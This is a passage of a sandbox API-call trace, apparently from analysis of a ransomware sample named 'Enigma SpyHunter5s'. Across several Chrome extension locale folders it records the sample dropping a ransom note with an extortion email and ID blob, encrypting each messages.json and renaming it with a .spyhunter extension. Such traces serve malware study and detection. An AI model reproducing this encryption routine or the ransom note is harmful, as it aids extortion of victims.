lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json.spyhunter")) returned 1 [0159.462] GetProcessHeap () returned 0x2c0000 [0159.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.462] GetProcessHeap () returned 0x2c0000 [0159.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0159.462] GetProcessHeap () returned 0x2c0000 [0159.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f81d50 | out: hHeap=0x2c0000) returned 1 [0159.463] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.464] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.464] WriteFile (in: hFile=0x178, lpBuffer=0x25ceacb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cebf4, lpOverlapped=0x0 | out: lpBuffer=0x25ceacb*, lpNumberOfBytesWritten=0x25cebf4*=0x127, lpOverlapped=0x0) returned 1 [0159.465] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.465] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cebf4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cebf4*=0x2ac, lpOverlapped=0x0) returned 1 [0159.465] CloseHandle (hObject=0x178) returned 1 [0159.465] GetProcessHeap () returned 0x2c0000 [0159.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f06c70 | out: hHeap=0x2c0000) returned 1 [0159.465] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceb90 | out: pbBuffer=0x25ceb90) returned 1 [0159.465] GetProcessHeap () returned 0x2c0000 [0159.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0159.465] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ceb88*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ceb88*=0x30) returned 1 [0159.465] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.466] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json") returned 159 [0159.466] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.466] GetProcessHeap () returned 0x2c0000 [0159.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0159.466] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ceb4c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ceb4c*=0x282, lpOverlapped=0x0) returned 1 [0159.652] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffd7e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.653] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x282, lpNumberOfBytesWritten=0x25ceb4c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ceb4c*=0x282, lpOverlapped=0x0) returned 1 [0159.653] GetProcessHeap () returned 0x2c0000 [0159.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0159.653] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.653] WriteFile (in: hFile=0x178, lpBuffer=0x25ceb8c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ceb4c, lpOverlapped=0x0 | out: lpBuffer=0x25ceb8c*, lpNumberOfBytesWritten=0x25ceb4c*=0x4, lpOverlapped=0x0) returned 1 [0159.653] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ceb4c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25ceb4c*=0x30, lpOverlapped=0x0) returned 1 [0159.654] CloseHandle (hObject=0x178) returned 1 [0159.654] GetProcessHeap () returned 0x2c0000 [0159.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.654] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json.spyhunter") returned 169 [0159.654] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sl\\messages.json.spyhunter")) returned 1 [0159.655] GetProcessHeap () returned 0x2c0000 [0159.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.655] GetProcessHeap () returned 0x2c0000 [0159.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0159.655] GetProcessHeap () returned 0x2c0000 [0159.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f818b8 | out: hHeap=0x2c0000) returned 1 [0159.656] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_pt\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.656] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.656] WriteFile (in: hFile=0x178, lpBuffer=0x25ceac3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cebec, lpOverlapped=0x0 | out: lpBuffer=0x25ceac3*, lpNumberOfBytesWritten=0x25cebec*=0x127, lpOverlapped=0x0) returned 1 [0159.657] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.657] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cebec, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cebec*=0x2ac, lpOverlapped=0x0) returned 1 [0159.657] CloseHandle (hObject=0x178) returned 1 [0159.658] GetProcessHeap () returned 0x2c0000 [0159.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0fb10 | out: hHeap=0x2c0000) returned 1 [0159.658] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceb88 | out: pbBuffer=0x25ceb88) returned 1 [0159.658] GetProcessHeap () returned 0x2c0000 [0159.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0159.658] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ceb80*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ceb80*=0x30) returned 1 [0159.658] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.659] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json") returned 162 [0159.659] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.659] GetProcessHeap () returned 0x2c0000 [0159.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0159.659] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ceb44, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ceb44*=0x295, lpOverlapped=0x0) returned 1 [0159.706] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffd6b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.706] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x295, lpNumberOfBytesWritten=0x25ceb44, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ceb44*=0x295, lpOverlapped=0x0) returned 1 [0159.706] GetProcessHeap () returned 0x2c0000 [0159.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0159.707] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.707] WriteFile (in: hFile=0x178, lpBuffer=0x25ceb84*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ceb44, lpOverlapped=0x0 | out: lpBuffer=0x25ceb84*, lpNumberOfBytesWritten=0x25ceb44*=0x4, lpOverlapped=0x0) returned 1 [0159.707] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ceb44, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25ceb44*=0x30, lpOverlapped=0x0) returned 1 [0159.707] CloseHandle (hObject=0x178) returned 1 [0159.707] GetProcessHeap () returned 0x2c0000 [0159.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.707] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json.spyhunter") returned 172 [0159.707] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_PT\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\pt_pt\\messages.json.spyhunter")) returned 1 [0159.708] GetProcessHeap () returned 0x2c0000 [0159.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.709] GetProcessHeap () returned 0x2c0000 [0159.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0159.709] GetProcessHeap () returned 0x2c0000 [0159.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f06610 | out: hHeap=0x2c0000) returned 1 [0159.709] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.710] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.710] WriteFile (in: hFile=0x178, lpBuffer=0x25ceabb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cebe4, lpOverlapped=0x0 | out: lpBuffer=0x25ceabb*, lpNumberOfBytesWritten=0x25cebe4*=0x127, lpOverlapped=0x0) returned 1 [0159.711] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.711] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cebe4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cebe4*=0x2ac, lpOverlapped=0x0) returned 1 [0159.711] CloseHandle (hObject=0x178) returned 1 [0159.711] GetProcessHeap () returned 0x2c0000 [0159.711] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f05fb0 | out: hHeap=0x2c0000) returned 1 [0159.711] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceb80 | out: pbBuffer=0x25ceb80) returned 1 [0159.711] GetProcessHeap () returned 0x2c0000 [0159.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0159.711] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ceb78*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ceb78*=0x30) returned 1 [0159.711] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.712] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json") returned 159 [0159.712] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.712] GetProcessHeap () returned 0x2c0000 [0159.712] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0159.712] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ceb3c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ceb3c*=0x284, lpOverlapped=0x0) returned 1 [0159.875] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffd7c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.875] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x284, lpNumberOfBytesWritten=0x25ceb3c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ceb3c*=0x284, lpOverlapped=0x0) returned 1 [0159.875] GetProcessHeap () returned 0x2c0000 [0159.875] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0159.875] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.875] WriteFile (in: hFile=0x178, lpBuffer=0x25ceb7c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ceb3c, lpOverlapped=0x0 | out: lpBuffer=0x25ceb7c*, lpNumberOfBytesWritten=0x25ceb3c*=0x4, lpOverlapped=0x0) returned 1 [0159.875] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ceb3c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25ceb3c*=0x30, lpOverlapped=0x0) returned 1 [0159.875] CloseHandle (hObject=0x178) returned 1 [0159.875] GetProcessHeap () returned 0x2c0000 [0159.875] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.875] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json.spyhunter") returned 169 [0159.875] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\nb\\messages.json.spyhunter")) returned 1 [0159.876] GetProcessHeap () returned 0x2c0000 [0159.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.877] GetProcessHeap () returned 0x2c0000 [0159.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0159.877] GetProcessHeap () returned 0x2c0000 [0159.877] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f80f88 | out: hHeap=0x2c0000) returned 1 [0159.877] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\hi\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0159.882] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.883] WriteFile (in: hFile=0x178, lpBuffer=0x25ceab3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cebdc, lpOverlapped=0x0 | out: lpBuffer=0x25ceab3*, lpNumberOfBytesWritten=0x25cebdc*=0x127, lpOverlapped=0x0) returned 1 [0159.883] lstrlenA 